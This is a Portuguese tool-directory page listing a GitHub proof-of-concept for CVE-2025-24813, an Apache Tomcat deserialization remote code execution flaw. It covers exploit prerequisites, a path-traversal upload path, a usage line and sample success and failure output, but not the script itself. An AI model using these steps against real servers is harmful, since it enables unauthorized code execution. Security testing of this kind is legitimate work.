Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
POC-CVE-2025-24813 — Seu repositório contém um script automatizado de Prova de Conceito (PoC) para explorar **CVE-2025-24813**, uma vulnerabilidade de Execução Remota de Código (RCE) no Apache Tomcat. A vulnerabilidade permite que um atacante envie um payload serializado malicioso para o servidor, levando à execução arbitrária de código por meio de desserialização quando condições específicas são atendidas. | Kitploit
Ferramentas/GitHubGitHub/absholi7ly/poc-cve-2025-24813
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubabsholi7ly/poc-cve-2025-24813

POC-CVE-2025-24813

Ver Repositório
195434há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Seu repositório contém um script automatizado de Prova de Conceito (PoC) para explorar **CVE-2025-24813**, uma vulnerabilidade de Execução Remota de Código (RCE) no Apache Tomcat. A vulnerabilidade permite que um atacante envie um payload serializado malicioso para o servidor, levando à execução arbitrária de código por meio de desserialização quando condições específicas são atendidas.

Compartilhar

CVE-2025-24813 Apache Tomcat RCE PoC

Prova de Conceito (PoC) explorando CVE-2025-24813, uma vulnerabilidade de Execução Remota de Código (RCE) no Apache Tomcat. A vulnerabilidade permite que um atacante envie uma carga útil serializada maliciosa para o servidor, levando à execução arbitrária de código por meio de desserialização quando condições específicas são atendidas.

Descrição

CVE-2025-24813 é uma vulnerabilidade teórica de RCE no Apache Tomcat que aproveita o tratamento inadequado de arquivos de sessão enviados e mecanismos de desserialização. Ao enviar uma carga útil criada para um diretório gravável (por exemplo, /uploads/../sessions/), um atacante pode acionar a desserialização, resultando na execução de comandos arbitrários no servidor alvo.


Pré-requisitos para Exploração Bem-sucedida

Para que este PoC explore a vulnerabilidade com sucesso, as seguintes condições devem ser atendidas:

  1. Versão do Apache Tomcat: O alvo deve estar executando uma versão vulnerável do Apache Tomcat.
  2. Diretório Gravável: O servidor deve permitir requisições PUT
  3. Gatilho de Desserialização: O servidor deve processar o arquivo de sessão enviado (por exemplo, via uma requisição GET para /index.jsp) e acionar a desserialização da carga útil.
  4. Ambiente Java: A máquina do atacante deve ter Java instalado para gerar cargas úteis usando ysoserial ou compilar cargas úteis baseadas em Java.
  5. ysoserial (Opcional): Se usar o tipo de carga útil ysoserial, o arquivo ysoserial.jar deve estar disponível localmente.

root@kitploit:~
python CVE-2025-24813.py <target_url> [options]

Saída

  • Exploração bem-sucedida:
root@kitploit:~
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://localhost:8081/uploads/../sessions/absholi7ly.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://localhost:8081 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser
  • Falha na exploração:
root@kitploit:~
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[-] Payload upload failed: http://localhost:8081/uploads/../sessions/absholi7ly.session (HTTP 403)
[-] Target http://localhost:8081 does not appear vulnerable or exploit failed.
[+] Temporary file removed: payload.ser
Baixar ferramenta